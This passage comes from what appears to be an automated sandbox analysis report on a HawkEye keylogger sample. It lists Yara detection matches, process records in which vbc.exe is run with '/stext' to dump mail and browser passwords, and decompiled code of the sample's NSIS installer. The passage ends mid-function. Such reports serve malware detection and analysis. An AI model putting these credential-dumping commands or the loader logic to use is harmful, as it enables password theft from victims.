                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.357332118.0000000007610000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: dw20.exe PID: 6640 Parent PID: 6244

                                                                                            General

                                                                                            Start time:18:17:52
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:dw20.exe -x -s 2128
                                                                                            Imagebase:0x10000000
                                                                                            File size:33936 bytes
                                                                                            MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: vbc.exe PID: 6716 Parent PID: 6244

                                                                                            General

                                                                                            Start time:18:17:54
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                                                                                            Imagebase:0x400000
                                                                                            File size:1171592 bytes
                                                                                            MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.330884518.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: vbc.exe PID: 6736 Parent PID: 6244

                                                                                            General

                                                                                            Start time:18:17:55
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                                                                                            Imagebase:0x400000
                                                                                            File size:1171592 bytes
                                                                                            MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.331916237.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Reset < >

                                                                                              Analysis Process: 5.exe PID: 1928 Parent PID: 6032 5.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 004030E3, Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270filestringcomCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 83%
                                                                                              			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405C49(8);
				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
				E0040592B("qjsvdse Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\alfons\\Desktop\\5.exe\" ";
				E0040592B(_t96, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\alfons\\Desktop\\5.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E00405449(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405449(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004030AF(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C0B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E00403464();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x42ebf4; // 0x0
											if(__eflags != 0) {
												_t106 = E00405C49(3);
												_t100 = E00405C49(4);
												_t55 = E00405C49(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x42ec0c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004051EC(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x42eb7c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403489();
										goto L32;
									}
									_t103 = E00405449(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\alfons\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t101);
										}
										E0040592B(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x42eb70; // 0x654160
											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x428b90);
											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\5.exe", 0x428b90, 1) != 0) {
												_push(0);
												_push(0x428b90);
												E00405679();
												_t77 =  *0x42eb70; // 0x654160
												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040518B(0x428b90);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E00405679();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004054FF(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004030AF(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                                                                              0x004030ef
                                                                                              0x004030f3
                                                                                              0x004030fb
                                                                                              0x004030fd
                                                                                              0x00403102
                                                                                              0x0040310d
                                                                                              0x00403114
                                                                                              0x0040311c
                                                                                              0x00403126
                                                                                              0x0040313c
                                                                                              0x0040314c
                                                                                              0x00403151
                                                                                              0x00403157
                                                                                              0x0040315e
                                                                                              0x00403171
                                                                                              0x00403176
                                                                                              0x00403178
                                                                                              0x0040317a
                                                                                              0x0040317f
                                                                                              0x0040317f
                                                                                              0x0040318f
                                                                                              0x00403195
                                                                                              0x004031fe
                                                                                              0x004031fe
                                                                                              0x00403200
                                                                                              0x00403202
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040319b
                                                                                              0x0040319e
                                                                                              0x004031a6
                                                                                              0x004031a6
                                                                                              0x004031a9
                                                                                              0x004031ae
                                                                                              0x004031b0
                                                                                              0x004031b0
                                                                                              0x004031b1
                                                                                              0x004031b1
                                                                                              0x004031b6
                                                                                              0x004031b9
                                                                                              0x004031ee
                                                                                              0x004031f3
                                                                                              0x004031f8
                                                                                              0x004031fb
                                                                                              0x004031fd
                                                                                              0x004031fd
                                                                                              0x004031fd
                                                                                              0x00000000
                                                                                              0x004031bb
                                                                                              0x004031bb
                                                                                              0x004031bc
                                                                                              0x004031bf
                                                                                              0x004031c7
                                                                                              0x004031ca
                                                                                              0x004031cc
                                                                                              0x004031cc
                                                                                              0x004031cc
                                                                                              0x004031ca
                                                                                              0x004031cf
                                                                                              0x004031d5
                                                                                              0x004031dd
                                                                                              0x004031e0
                                                                                              0x004031e2
                                                                                              0x004031e2
                                                                                              0x004031e2
                                                                                              0x004031e0
                                                                                              0x004031e5
                                                                                              0x004031ec
                                                                                              0x00403206
                                                                                              0x00403209
                                                                                              0x00403209
                                                                                              0x00403212
                                                                                              0x00403217
                                                                                              0x00403217
                                                                                              0x00403222
                                                                                              0x00403228
                                                                                              0x0040322d
                                                                                              0x0040322f
                                                                                              0x00403251
                                                                                              0x00403256
                                                                                              0x0040325d
                                                                                              0x00403264
                                                                                              0x00403268
                                                                                              0x004032cf
                                                                                              0x004032cf
                                                                                              0x004032d4
                                                                                              0x004032de
                                                                                              0x004033c9
                                                                                              0x004033cf
                                                                                              0x004033da
                                                                                              0x004033e3
                                                                                              0x004033e5
                                                                                              0x004033ea
                                                                                              0x004033ec
                                                                                              0x004033ee
                                                                                              0x004033f0
                                                                                              0x004033f2
                                                                                              0x004033f4
                                                                                              0x004033f6
                                                                                              0x00403406
                                                                                              0x00403408
                                                                                              0x0040340a
                                                                                              0x00403417
                                                                                              0x00403426
                                                                                              0x0040342e
                                                                                              0x00403436
                                                                                              0x00403436
                                                                                              0x0040340a
                                                                                              0x004033f6
                                                                                              0x004033f2
                                                                                              0x0040343b
                                                                                              0x00403441
                                                                                              0x00403443
                                                                                              0x00403447
                                                                                              0x00403447
                                                                                              0x00403443
                                                                                              0x0040344c
                                                                                              0x00403451
                                                                                              0x00403454
                                                                                              0x00403456
                                                                                              0x00403456
                                                                                              0x0040345e
                                                                                              0x0040345e
                                                                                              0x004032ed
                                                                                              0x004032f4
                                                                                              0x004032f4
                                                                                              0x0040326a
                                                                                              0x00403270
                                                                                              0x004032bf
                                                                                              0x004032bf
                                                                                              0x004032cb
                                                                                              0x00000000
                                                                                              0x004032cb
                                                                                              0x00403279
                                                                                              0x00403286
                                                                                              0x0040327d
                                                                                              0x00403283
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403285
                                                                                              0x00403285
                                                                                              0x00403285
                                                                                              0x0040328a
                                                                                              0x0040328c
                                                                                              0x00403294
                                                                                              0x00403300
                                                                                              0x00403305
                                                                                              0x00403314
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403318
                                                                                              0x0040331f
                                                                                              0x00403325
                                                                                              0x0040332b
                                                                                              0x00403333
                                                                                              0x00403333
                                                                                              0x00403341
                                                                                              0x00403348
                                                                                              0x00403351
                                                                                              0x00403357
                                                                                              0x00403357
                                                                                              0x00403363
                                                                                              0x00403369
                                                                                              0x00403373
                                                                                              0x00403387
                                                                                              0x00403388
                                                                                              0x00403389
                                                                                              0x0040338e
                                                                                              0x0040339a
                                                                                              0x004033a0
                                                                                              0x004033a7
                                                                                              0x004033aa
                                                                                              0x004033b0
                                                                                              0x004033b0
                                                                                              0x004033a7
                                                                                              0x004033b4
                                                                                              0x004033ba
                                                                                              0x004033ba
                                                                                              0x004033bd
                                                                                              0x004033be
                                                                                              0x004033bf
                                                                                              0x00000000
                                                                                              0x004033bf
                                                                                              0x00403296
                                                                                              0x00403298
                                                                                              0x004032a3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004032ab
                                                                                              0x004032b6
                                                                                              0x004032bb
                                                                                              0x00000000
                                                                                              0x004032bb
                                                                                              0x00403237
                                                                                              0x00403243
                                                                                              0x00403248
                                                                                              0x0040324d
                                                                                              0x0040324f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040324f
                                                                                              0x00000000
                                                                                              0x004031ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031a0
                                                                                              0x004031a0
                                                                                              0x004031a0
                                                                                              0x004031a1
                                                                                              0x004031a1
                                                                                              0x00000000
                                                                                              0x004031a0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 00403102
                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 0040310D
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403114
                                                                                                • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                                                                                • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,qjsvdse Setup,NSIS Error), ref: 00405938
                                                                                              • GetCommandLineA.KERNEL32(qjsvdse Setup,NSIS Error), ref: 00403151
                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 00403164
                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\5.exe" ,00000020), ref: 0040318F
                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                                                                              • DeleteFileA.KERNEL32(1033), ref: 00403256
                                                                                              • OleUninitialize.OLE32(00000000), ref: 004032D4
                                                                                              • ExitProcess.KERNEL32 ref: 004032F4
                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5.exe" ,00000000,00000000), ref: 00403300
                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5.exe" ,00000000,00000000), ref: 0040330C
                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                                                                              • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\5.exe,00428B90,00000001), ref: 0040337D
                                                                                              • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                                                                              • ExitWindowsEx.USER32 ref: 0040343B
                                                                                              • ExitProcess.KERNEL32 ref: 0040345E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\5.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$`Ae$qjsvdse Setup$~nsu.tmp
                                                                                              • API String ID: 2278157092-695628792
                                                                                              • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                              • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                                                                              • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                              • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405250, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 94%
                                                                                              			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004054FF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42ebe8 =  *0x42ebe8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E0040592B(0x42afe0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405465(_t72);
					} else {
						lstrcatA(0x42afe0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42afe0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
